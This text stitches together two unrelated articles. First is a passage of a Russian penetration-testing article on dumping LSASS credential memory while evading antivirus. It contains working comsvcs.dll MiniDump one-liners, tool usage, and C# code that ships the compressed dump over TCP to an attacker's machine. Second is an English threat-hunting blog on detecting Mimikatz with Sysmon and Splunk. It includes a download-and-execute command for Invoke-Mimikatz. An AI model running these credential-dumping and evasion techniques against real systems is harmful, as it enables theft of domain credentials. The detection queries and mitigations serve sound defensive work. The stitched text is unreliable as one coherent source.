Если взглянуть на код, можно найти суперские «однострочники» для Cmd и PowerShell, которые автоматически позволяют получить идентификатор процесса lsass.exe и сдампить его память по заданному пути.
C:\>for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B C:\lsass.dmp full
PS C:\> rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\lsass.dmp fullПримечание: лучше пользоваться PowerShell-версией команды, так как для оболочки PowerShell в отличии от Cmd по дефолту включена привилегия
SeDebugPrivilegeдля привилегированной сессии шелла, которая понадобится для доступа к памяти lsass.exe.
Стоит ли говорить, что создание дампа по такой простой технике, разумеется, будет предотвращено хотя бы мало-мальски неравнодушным антивирусом?
Out-Minidump.ps1
Еще один древний как мир способ — позаимствовать импорт P/Invoke функции MiniDumpWriteDump из класса NativeMethods сборки System.Management.Automation.WindowsErrorReporting, как это делается в скрипте Out-Minidump.ps1 из арсенала PowerSploit.
MiniDumpWriteDump
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWriteDump
Результат работы скрипта аналогичен вызову функции MiniDump из предыдущего метода, поэтому оставлю это в качестве упражнения для читателя. Ну и, соответственно, антивирусы так же негативно к нему относятся.
Дампим LSASS по OPSEC-овски
Итак, перейдем к самому интересному: как же можно «угодить» антивирусным средствам защиты и сделать дамп памяти процесса lsass.exe в стиле Operational Security?
Запреты AV на создание слепков памяти LSASS условно можно разделить на 3 части:
-
Запрет на получение дескриптора процесса lsass.exe.
-
Запрет на чтение виртуальной памяти процесса lsass.exe.
-
Запрет на сохранение результирующего дампа на диск.
Ниже мы рассмотрим 3 проекта, каждый из которых в свое время помогал мне извлечь чувствительную информацию из памяти сетевых узлов при активном средстве KES на внутренних пентестах или операциях Red Team.
MirrorDump
Первым обнаруженным мною проектом, который на удивление мог обходить защиту KES, был MirrorDump от исследователя @_EthicalChaos_.
Его ключевые особенности:
-
Написан на C#, что позволяет запускать его из памяти сессии C2 или с помощью механизма .NET
Reflection.Assembly. -
Применяет магию Boo.Lang и плагина DllExport для генерации «на лету» псевдопровайдера аутентификации LSA SSP и его загрузки в память LSASS для получения дескриптора процесса lsass.exe вместо использования API NtOpenProcess.
-
Использует проекты MiniHook и SharpDisasm для установки userland-хуков на вызовы внутренних API
MiniDumpWriteDumpдля перенаправления потока байт результирующего слепка памяти lsass.exe в память исполняющего процесса. Таким образом у оператора появляется возможность отправить дамп памяти по сети и не сохранять его на диск скомпрометированного хоста.
В минусы этого способа безусловно входит то, что библиотека DLL псевдопровайдера аутентификации LSA должна быть сохранена на диск скомпрометированного хоста для возможности ее использования в API SpLsaModeInitialize, и которая, ко всему прочему, не может быть удалена после создания дампа без перезагрузки ПК.
Данный проект существует как Proof-of-Concept, который «из коробки» в конечном итоге все равно сохраняет дамп памяти на диск даже с учетом того, что генерация такого дампа проходит столь необычным образом. Поэтому я решил сделать свой форк, добавив две новые фичи:
-
Парсинг слепка прямо в памяти с помощью библиотеки MiniDump (работает не на всех версиях ОС Windows).
-
Возможность сжатия и отправки байт слепка памяти по TCP-каналу на машину атакующего, где парсинг может быть произведен силами сторонних инструментов (Mimikatz / Pypykatz).
Для первой фичи был добавлен флаг --parse, при наличии которого байты слепка передаются на EntryPoint MiniDump.
Cmd
C:\>MirrorDump.exe --dllName LegitLSAPlugin1.dll --parse
Для второй фичи был написан вспомогательный скрипт на Python, содержащий тривиальный сокет-сервер, ожидающий «зиппованный» дамп. Скрипт также автоматически распакует прилетевший дамп, по желанию проверит контрольную сумму и распрасит его с помощью Pypykatz.
Cmd
~$ python3 MirrorDump.py 0.0.0.0 1337 --md5 --parse
C:\>MirrorDump.exe --dllName LegitLSAPlugin1.dll --host 192.168.0.184 --port 1337
Отправка запакованного дампа также легко реализуется на нативном C# через метод SendZip.
static void SendZip(string host, int port, DumpContext dc)
{
using (var outStream = new MemoryStream())
{
using (var archive = new ZipArchive(outStream, ZipArchiveMode.Create, true))
{
var lsassDump = archive.CreateEntry($"{Guid.NewGuid()}.bin");
using (var entryStream = lsassDump.Open())
using (var dumpCompressStream = new MemoryStream(dc.Data))
dumpCompressStream.CopyTo(entryStream);
}
byte[] compressedBytes = outStream.ToArray();
Console.WriteLine($"[+] Minidump successfully packed in memory, size {Math.Round(compressedBytes.Length / 1024.0 / 1024.0, 2)} MB");
byte[] zipHashBytes = MD5.Create().ComputeHash(compressedBytes);
string zipHash = BitConverter.ToString(zipHashBytes).Replace("-", "");
Console.WriteLine($"[*] MD5: {zipHash}");
using (var tcpClient = new TcpClient(host, port))
{
using (var netStream = tcpClient.GetStream())
{
string hostName = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
string zipSize = (compressedBytes.Length).ToString();
byte[] stage = Encoding.ASCII.GetBytes($"{hostName}|{zipSize}");
netStream.Write(stage, 0, stage.Length);
netStream.Write(compressedBytes, 0, compressedBytes.Length);
}
}
}
}Также метод создания слепков lsass.exe с помощью MirrorDump был добавлен мной для использования вместе с lsassy.
К сожалению, недолго музыка играла и примерно полгода спустя «Касперский» начал блокировать создание дампов LSASS через данную технику на уровне поведенческого анализа, что заставило нас искать другой «непалящийся» способ извлечения кред на внутряках.
NanoDump
Нашим следующим «спасителем» стал инструмент NanoDump от компании-разработчика Cobalt Strike, который я без преувеличений считаю просто произведением искусства.
Его ключевые особенности:
-
Использование системных вызовов (с их динамическим резолвом) с помощью SysWhispers2, что позволяет обходить userland-хуки Win32 API, которые вешает антивирусное ПО.
-
Собственная реализация MiniDumpWriteDump через чтение памяти lsass.exe с помощью ZwReadVirtualMemory, что избавляет оператора от необходимости дергать потенциально подозрительную ручку API.
-
Поддержка разных трюков и техник создания дампа (перечислены не все):
-
поиск уже открытых дескрипторов lsass.exe в других процессах [ссылка],
-
использование утекающего хэндла lsass.exe при вызове функции
CreateProcessWithLogonW[ссылка], -
загрузка NanoDump в виртуальную память lsass.exe в виде провайдера SSP [ссылка],
-
возможность снятия защиты PPL [ссылка].
-
-
Намеренное повреждение сигнатуры дампа памяти с целью избегания детекта от AV на этапе его записи на диск.
-
Компиляция в Beacon Object File (BOF) для выполнения NanoDump из памяти в случае, когда моделируемый злоумышленник обладает сессией «Кобальта» на скомпрометированном сетевом узле.
Для нас, как для пентестеров компаний преимущественно из ру-сегмента, наибольший интерес представляет техника загрузки NanoDump, скомпилированного в виде DLL, прямо в LSASS как SSP, то есть в виде псевдопровайдера аутентификации LSA. Исходя из нашего опыта, на данный момент это и есть слабое место «Касперского».
Для того, чтобы воспользоваться этой техникой без сессии Cobalt Strike, моделируемый злоумышленник должен принести на скомпрометированный узел 2 бинаря: загрузчик библиотеки SSP и, собственно, саму библиотеку SSP. Полагаю, что в скором времени оба они начнут детектиться по крайней мере на уровне сигнатурного анализа, поэтому воспользовавшись примером из этого ресерча от @ShitSecure мы напилили свой загрузчик NanoDump SSP из памяти с помощью кредла на PowerShell.
Намеренно не раскрываю исходник кредла (тем более, что в приведенной выше статье все есть), ибо надеюсь, что этот метод проживет хотя бы еще немного. Ну а в общем, смиренно ждем, когда и эта техника начнет «палиться» KES, чтобы начать искать новые ухищрения для дампа памяти LSASS…
Physmem2profit
Последним творением, которое мы сегодня рассмотрим, будет проект Physmem2profit от F-Secure LABS. Его подход к дампу LSASS отличается от остальных тем, что вместо того, чтобы сосредотачиваться на методах уклонения от хуков AV / EDR в userland, он использует драйвер WinPmem (часть форензик-проекта rekall) для получения доступа ко всей физической памяти целевого узла и ищет там область, соответствующую памяти процесса lsass.exe, через монтирование виртуальной ФС FUSE.
Покажем в действии, как заставить это чудо работать:
-
Для начала клонируем репозиторий проекта, рекурсивно разрешая зависимости в виде git-подмодулей.
-
Далее исправим версии библиотек
acoraиpycryptodomeв зависимостяхrekall-core, чтобы они дружили с актуальным Python 3. -
Теперь можно запустить инсталлер, который накатит питонячую виртуальную среду и поставит все, что ему нужно.
Cmd
git clone --recursive https://github.com/FSecureLABS/physmem2profit
cd physmem2profit/client
sed -i 's/acora==2.1/acora/g' rekall/rekall-core/setup.py
sed -i 's/pycryptodome==3.4.7/pycryptodome/g' rekall/rekall-core/setup.py
bash install.sh
source .env/bin/activate
Следуя рекомендациям из этого issue, я скачал крайний релиз WinPmem (нам понадобится только файл kernel/binaries/winpmem_x64.sys) и обновил эти константы для изменившегося интерфейса взаимодействия с драйвером. Внесенные изменения можно посмотреть в моем форке проекта.
Также среди внесенных изменений — захардкоженный файл драйвера, который автоматически кладется в файловую систему «жертвы» перед установкой соответствующей службы и стирается после ее остановки и удаления:
static byte[] Decompress(byte[] data)
{
MemoryStream input = new MemoryStream(data);
MemoryStream output = new MemoryStream();
using (DeflateStream dStream = new DeflateStream(input, CompressionMode.Decompress))
dStream.CopyTo(output);
return output.ToArray();
}
// ...
Program.Log("Installing service...");
var sysCompressed = Convert.FromBase64String("<WINPMEM_BYTES_BASE64>");
var sysRawBytes = Decompress(sysCompressed);
File.WriteAllBytes(pathToDriver, sysRawBytes);
OpenOrCreate(pathToDriver);
Program.Log("Service created successfully.", Program.LogMessageSeverity.Success);
// ...
CloseHandle(_hDevice);
Stop();
Delete();
File.Delete(Globals.pathToDriver);
Program.Log("Successfully unloaded the WinPMem driver.", Program.LogMessageSeverity.Success);Смотрим, как всем этим пользоваться:
# Server-side
PS > .\Physmem2profit.exe --ip <LHOST> --port <LPORT> [--verbose] [--hidden]
# Client-side
~$ python3 physmem2profit --host <RHOST> --port <RPORT> --install "C:/Windows/Temp/winpmem_x64.sys" --mode all --driver winpmemЧтобы не упускать преимуществ C#, на котором написана серверная часть, продемонстрируем возможность загрузки и выполнения сборки из памяти.
Вуаля, хеши из LSASS получены!
Противодействие
Вместо заключения приведу несколько рекомендаций, которые помогут свести к минимуму возможности для потенциального злоумышленника сдампить LSASS или извлечь из сделанного слепка значительную выгоду:
-
Свести к минимуму доступ к любым сетевым узлам в домене с учетными данными пользователей, входящих в привилегированные доменные группы (Domain Admins, Enterprise Admins, Administrators и др.), а для администрирования серверов и рабочих станций использовать выделенные для данных целей УЗ с минимально необходимым набором привилегий (смотрим концепцию Tiered Access Model).
-
Настроить механизм безопасности Remote Credential Guard для предотвращения сохранения аутентификационных данных пользователей при подключении к удаленным сетевым узлам по протоколу RDP для привилегированных УЗ.
-
Использовать механизм Protected Process (PPL) для предотвращения потенциальной возможности доступа к памяти процесса lsass.exe.
-
Использовать группу безопасности Windows «Защищенные пользователи» (Protected Users Security Group) и добавить в нее УЗ критически важных пользователей, например, администраторов домена (эта фича требует тестирования перед внедрением в прод, поэтому аккуратнее).
-
Следовать рекомендациям производителя ОС для снижения риска проведения атак типа Pass-the-Hash.
Ну а пока извечная игра в кошки-мышки между пентестерами и вендорами антивирусного ПО продолжается, Happy hacking!
- Chasing down PowershellMafia
- Threat Profile
- Mimikatz as a standalone executable
- Hunting with Sysmon Events Only
- Hunting with Sysmon and Windows Events
- Detection Artifact I
- Running Mimikatz from memory using Invoke-Mimikatz from PowerSploit
- Hunting with Sysmon and Windows Events
- Detection Artifact II
- Detection Artifact III
- Detection Artifact IV
- Changes to your Sysmon Config
- Updates
Chasing down PowershellMafia
In the first of my tales we will analyze the behaviour of tools that need to read from Lsass.exe process’ memory in order to steal valuable credential information. For this, we will begin with Mimikatz, as it’s quite renowned and we all like gentilkiwi! We will investigate Mimikatz’ behaviour whilst running as a standalone executable and whilst running from memory (fileless scenario).
After a sweep of the artifacts that are observable using standard Windows/Sysmon logs, we will detonate Mimikatz and analize its memory traces using Volatility to evaluate if we can find any markers that will allow us to create other Yara/SIEM rules.
Finally, the goal is to run other credential dumping tools and attempt to identify any commonalities that could provide for a more abstract IOC.
Our end goal: to develop detection artifacts (IOCs, Correlation Rules, Other Signatures, etc.) that would allow us to capture most of the tricks used by the wizards of powershellmafia. Terrible things wait for us ahead, are you brave enough? ヾ(⌐■_■)ノ
Threat Profile
For the purposes of starting a classification of the threats that will be explored in these series, let’s begin with a rough categorization scheme that will evolve into a more complete threat ontology framework.
| Category | Exfiltration |
| Type | lsass process injection/manipulation/read |
| Execution Types | in-memory (fileless) or standalone executable |
| Detection Ratio | 80% |
| PoC Tools | Mimikatz / Inject-LogonCredentials / Invoke-ReflectivePEInjection |
| Hunting Method | Grouping |
| Test OS | Win10 (OS Build 14393.321) |
Mimikatz as a standalone executable
Here we focus solely on the most popular combination of commands (same applies for in-memory Mimikatz):
privilege::debug
sekurlsa::logonpasswords
For in-memory Mimikatz we will also test it by direct download via powershell rather than downloading the script to disk:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia
/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
Hunting with Sysmon Events Only
To begin these series, we will use Splunk (the free version, I will also add some snips for ELK later) due to its powerful query language and ease of use, to cut the time from logging to identification.
First thing we observe is that, when running Mimikatz as a standalone executable, we have ~84 events in total within a timewindow of 3s (this is relevant in the sense that your IOC or Correlation Rule shouldn’t be looking for signs beyond the 5s window):
If we reduce those events to their unique instances and sort them by time we get the following sequence:
Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" | dedup EventCode
If we look at the EventCode field which holds the value of the Windows Security or Sysmon Event ID we can observe the following sequence:
With all this info we should be able to craft a detection artifact based on a time-ordered sequence of events, on the one side, and an unordered BOOLEAN logic on the other. So let’s delve into the sequence of generated events to determine if we can extract a valid pattern for our detection artifact.
First, Sysmon “Process Create” (EventCode 1):
Not much to see here, hashes and “cmd.exe” as ParentImage are the only interesting markers, but an intruder could easily modify 1byte in the Mimikatz code to render hash detection useless, and “cmd.exe” may not always be the parent of the process.
Next is a series of EventCode 10, which equates to Sysmon’s “Process Accessed”
Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess
The interesting info about lsass accessing Mimikatz can be seen here:
GrantedAccess: 0x1478
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5314|C:\Windows\system32\lsasrv.dll+d127|C:\Windows\system32\lsasrv.dll+e1dd|C:\Windows\system32\lsasrv.dll+cfa5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+77de3|C:\Windows\System32\RPCRT4.dll+dbc6d|C:\Windows\System32\RPCRT4.dll+a8dc|C:\Windows\System32\RPCRT4.dll+5a194|C:\Windows\System32\RPCRT4.dll+590ad|C:\Windows\System32\RPCRT4.dll+5995b|C:\Windows\System32\RPCRT4.dll+39afc|C:\Windows\System32\RPCRT4.dll+39f7c|C:\Windows\System32\RPCRT4.dll+5426c|C:\Windows\System32\RPCRT4.dll+55acb|C:\Windows\System32\RPCRT4.dll+485ca|C:\Windows\SYSTEM32\ntdll.dll+325fe|C:\Windows\SYSTEM32\ntdll.dll+330d9|C:\Windows\System32\KERNEL32.DLL+8364|C:\Windows\SYSTEM32\ntdll.dll+65e91
GrantedAccess: 0x1000
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5ea4|C:\Windows\System32\RPCRT4.dll+10a1f|C:\Windows\system32\lsasrv.dll+ceed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+77de3|C:\Windows\System32\RPCRT4.dll+dbc6d|C:\Windows\System32\RPCRT4.dll+a8dc|C:\Windows\System32\RPCRT4.dll+5a194|C:\Windows\System32\RPCRT4.dll+590ad|C:\Windows\System32\RPCRT4.dll+5995b|C:\Windows\System32\RPCRT4.dll+39afc|C:\Windows\System32\RPCRT4.dll+39f7c|C:\Windows\System32\RPCRT4.dll+5426c|C:\Windows\System32\RPCRT4.dll+55acb|C:\Windows\System32\RPCRT4.dll+485ca|C:\Windows\SYSTEM32\ntdll.dll+325fe|C:\Windows\SYSTEM32\ntdll.dll+330d9|C:\Windows\System32\KERNEL32.DLL+8364|C:\Windows\SYSTEM32\ntdll.dll+65e91
After this interaction, Mimikatz finally decides to access lsass:
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5314|C:\Windows\System32\KERNELBASE.dll+2940d|C:\Users\Artanis\Documents\mimikatz_trunk\x64\mimikatz.exe+6dc6c|C:\Users\Artanis\Documents\mimikatz_trunk\x64\mimikatz.exe+6dfd9|C:\Users\Artanis\Documents\mimikatz_trunk\x64\mimikatz.exe+6db91|C:\Users\Artanis\Documents\mimikatz_trunk\x64\mimikatz.exe+4ae04|C:\Users\Artanis\Documents\mimikatz_trunk\x64\mimikatz.exe+4ac3a|C:\Users\Artanis\Documents\mimikatz_trunk\x64\mimikatz.exe+4aa21|C:\Users\Artanis\Documents\mimikatz_trunk\x64\mimikatz.exe+73935|C:\Windows\System32\KERNEL32.DLL+8364|C:\Windows\SYSTEM32\ntdll.dll+65e91
The next interesting Event is EventCode 7 or Sysmon’s “Image Loaded”:
Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess 
We can see all the modules that are imported by Mimikatz in order to be able to do its thing. These constitute a good marker as well, not by themselves but in conjuntion with our other events.
Next in the line we find a Sysmon Event 11 “File Create” which points to the creation of a pre-fetch record for Mimikatz created by SVCHOST which is hosting Windows’ prefetch service:
We then observe Sysmon’s Event ID 8 which corresponds to “Create Remote Thread”, curiously enough, it’s WmiPrvSE the one starting a remote threat on Mimikatz, we never thought Mimikatz itself was going the be the victim instead of the victimator!
After this, we observe a sequence similar to the one described in the previous Sysmon Event ID 10, where Mimikatz is accessed by a few processes and finally accesses lsass (same Access Mask [0x1010] and Call Trace).
Hunting with Sysmon and Windows Events
This hunt gets even more interesting when we start observing Windows Security and Sysmon Events intertwined together
Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" | stats count by EventCode, _time | sort _time
Here we notice that Events 4663 (An attempt was made to access an object), 4656 (A handle to an Object was requested), 4703 (Token Right Adjusted) and 4673 (Sensitive Privilege Use) are showing up. Their presence makes sense, due to the operations that Mimikatz has to go through in order to access lsass process’ memory. As you can see, it’s starting to look quite hard for such a program to hide from event traces. Of course, Mimikatz could also be loaded from memory in a fileless scenario, and event log tracing could be disabled with tools like Invoke-Phant0m, however, as we’ll see, these techniques can also leave traces. If the right audit policy is configured in your environment, even tools that interfere with and wipe Windows Event Logs need to load first and acquire a few OS privileges before doing evil right? And if you have a centralized logging system like a SIEM (again, as long as your log forwarding policy is properly configured) you will always have a trace of events even when they could have even been wiped out of the source host.
So if we actually break this down to the sequence of traces left behind by a Mimikatz file execution under the new scenario we have this:
| EventCode | _time | Comment |
|---|---|---|
| 1 | 2017-09-04T16:52:32.000-0700 | Sysmon Process Create: Mimikatz started |
| 4673 | 2017-09-04T16:52:32.000-0700 | Sensitive Privilege Use (Failure): SeTcbPrivilege requested by mimikatz.exe |
| 4688 | 2017-09-04T16:52:32.000-0700 | A new Process has been created (we knew this via Sysmon already) |
| 7 | 2017-09-04T16:52:32.000-0700 | Sysmon Image Loaded: A few events where Mimikatz loads all its required modules |
| 4703 | 2017-09-04T16:52:35.000-0700 | Token Right Adjusted: Enabled Privileges: SeDebugPrivilege / Process Name: mimikatz.exe |
| 10 | 2017-09-04T16:52:41.000-0700 | Sysmon Process Accessed: Source Image: mimikatz.exe / Target Image: lsass.exe / GrantedAcces: 0x1010 / CallTrace: multiple markers (see above) |
| 4656 | 2017-09-04T16:52:41.000-0700 | A handle to an object was requested: Process Name: mimikatz.exe / Accesses: Read from process memory / Acess Mask: 0x1010 |
| 4663 | 2017-09-04T16:52:41.000-0700 | An attempt was made to access an object: Process Name: mimikatz.exe / Access Mask: 0x10 |
| 11 | 2017-09-04T16:52:42.000-0700 | Sysmon File Created: Image: svchost.exe / TargetFileName: C:\Windows\Prefetch\MIMIKATZ.EXE-CE8DB7C6.pf |
Detection Artifact I
During our lab tests using Sysmon Event 10 (Process Accessed) proved to be most efficient. A Splunk query similar to this:
EventCode=10 | where (GrantedAccess="0x1010" AND TargetImage LIKE "%lsass.exe")
should get you pretty close to pinpointing some weird lsass.exe access 
However you could combine this marker along with the preceeding or following Windows Events to create a more robust detection for your SIEM solution via event correlation.
Running Mimikatz from memory using Invoke-Mimikatz from PowerSploit
For this next lab test, we will leverage the known PowerSploit module to load Mimikatz in memory without touching disk. The script was run at around 12:00:25.
Hunting with Sysmon and Windows Events
If we run the following search, limiting ourselves to the bare minimum progression of unique Events:
powershell OR lsass | dedup TaskCategory | stats count by _time, EventCode | chart count by EventCode
We get the following picture:
Which can be broken down into:
| Time | Comment |
|---|---|
| 09/06/2017 11:55:33 PM | So we find that the only process that resembles the “CallTrace” parameter observed for the standalone Mimikatz is wininit.exe. |
| 09/06/2017 11:55:33 PM | Pipe Created event where lsass.exe creates PipeName: \lsass |
| 09/06/2017 11:55:33 PM | We have a “Pipe Connected” event where “C:\Windows\system32\svchost.exe” uses “PipeName: \lsass” |
| 09/06/2017 11:56:44 PM | When powershell is started to host the malicious script it needs to start as “admin” which creates an EventCode 4703 (Token Right Adjusted) with the “SeDebugPrivilege”. This can be used in a transactional search disregarding the name of the process and searching for the process ID instead across different events. |
| 09/07/2017 12:00:25 AM | EventCode 4656 (A handle to an object was requested) — Process Name is “powershell”; Access Mask is 0x143A; Accesses are: “Create new thread in process; Perform virtual memory operation; Read from process memory; Write to process memory; Query process information” |
| 09/07/2017 12:00:25 AM | EventCode 4663 (An attempt was made to access an object) — Process Name is “powershell”; Access Mask is 0x10; Object Name is “\Device\HarddiskVolume2\Windows\System32\lsass.exe” |
| 09/07/2017 12:00:25 AM | EventCode 4673 (A privileged service was called) — Powershell fails to obtain SeTcbPrivilege; a behaviour we already observed with the standalone Mimikatz |
| 09/07/2017 12:00:25 AM | EventCode 4690 (An attempt was made to duplicate a handle to an object) — Source Process ID matches that of Powershell and the Target Process ID is System (0x4) |
| 09/07/2017 12:00:35 AM | EventCode 4673 (Sensitive Privilege Use) — lsass seems to invoke LsaRegisterLogonProcess() Service from the NT Local Security Authority Server. This happens 10s after Invoke-Mimikatz. |
Detection Artifact II
During our lab tests using Windows Event 4656 for detection of Mimikatz activity proved to be most efficient. A Splunk query similar to this:
EventCode=4656 OR EventCode=4663 | eval HandleReq=case(EventCode=4656 AND Object_Name LIKE "%lsass.exe" AND Access_Mask=="0x143A", Process_ID) | where (HandleReq=Process_ID)
or this
EventCode=4656 | where (Object_Name LIKE "%lsass.exe" AND Access_Mask=="0x143A")
constitute great candidates for an alert.
Detection Artifact III
Tested with the Empire version of Invoke-Mimikatz and realised that Access_Mask changes from “0x143A” to “0x1410”. This time however, when running this other version the Access_Mask generates more FP so we need to couple it with another AND gate that looks for processes finishing with “shell.exe” (powershell.exe). The caveat is that it will be easier to bypass ‘cause an attacker can always change the name of the powershell executable or load powershell without powershell! using a few dlls. If we couple this new detection with the other observed windows events though, a more robust signature may emerge.
EventCode=4656 | where ((Object_Name LIKE "%lsass.exe" AND Access_Mask=="0x143A") OR (Process_Name LIKE "%shell.exe" AND Object_Name LIKE "%lsass.exe" AND Access_Mask=="0x1410")
Detection Artifact IV
Tested with standalone Mimikatz from a Windows Server 2016 and this time, Access_Mask changes to “0x1010” which is more common than not. Most of all you will see svchost.exe accessing lsass with this mask. So this time we need to elaborate a correlation rule. We will use Sysmon Event 1 (ProcessCreate) and Event 10 (ProcessAccessed):
SEQUENCE:
1. EventCode=1 | where (match(ParentImage, "cmd.exe") AND match(IntegrityLevel, "high"))
2. EventCode=10 | where (match(GrantedAccess, "0x1010") AND !match(SourceImage, "svchost\.exe") AND match(TargetImage, "lsass\.exe"))
In the next article, we shall continue to explore other artifacts left behind by Mimikatz’s execution in memory as well as what type of events are generated by tools like Invoke-CredentialInjection. Later, we will run Mimikatz in the context of its several Kerberos-fooling techniques to see if we can detect spoofed Tickets and other treachery ;).
Changes to your Sysmon Config
Add the following to your sysmon config file to be able to detect this type of lsass access:
<!--SYSMON EVENT ID 10 : INTER-PROCESS ACCESS-->
<!--DATA: UtcTime, SourceProcessGuid, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace-->
<ProcessAccess onmatch="include">
<TargetImage condition="contains">lsass.exe</TargetImage>
</ProcessAccess>
<ProcessAccess onmatch="exclude">
<SourceImage condition="end with">wmiprvse.exe</SourceImage>
<SourceImage condition="end with">GoogleUpdate.exe</SourceImage>
<SourceImage condition="end with">LTSVC.exe</SourceImage>
<SourceImage condition="end with">taskmgr.exe</SourceImage>
<SourceImage condition="end with">VBoxService.exe</SourceImage> # Virtual Box
<SourceImage condition="end with">vmtoolsd.exe</SourceImage>
<SourceImage condition="end with">taskmgr.exe</SourceImage>
<SourceImage condition="end with">\Citrix\System32\wfshell.exe</SourceImage> #Citrix process in C:\Program Files (x86)\Citrix\System32\wfshell.exe
<SourceImage condition="is">C:\Windows\System32\lsm.exe</SourceImage> # System process under C:\Windows\System32\lsm.exe
<SourceImage condition="end with">Microsoft.Identity.AadConnect.Health.AadSync.Host.exe</SourceImage> # Microsoft Azure AD Connect Health Sync Agent
<SourceImage condition="begin with">C:\Program Files (x86)\Symantec\Symantec Endpoint Protection</SourceImage> # Symantec
</ProcessAccess>Updates
-
13/09/2017 added details about test OS & powershell expression used for in-memory execution. Added Detection Artifact III. -
18/09/2017 added sysmon config snip
Tags:
threat hunting, hunting, mimikatz, siem, ioc, credential dump, splunk, elk, darkquasar, volatility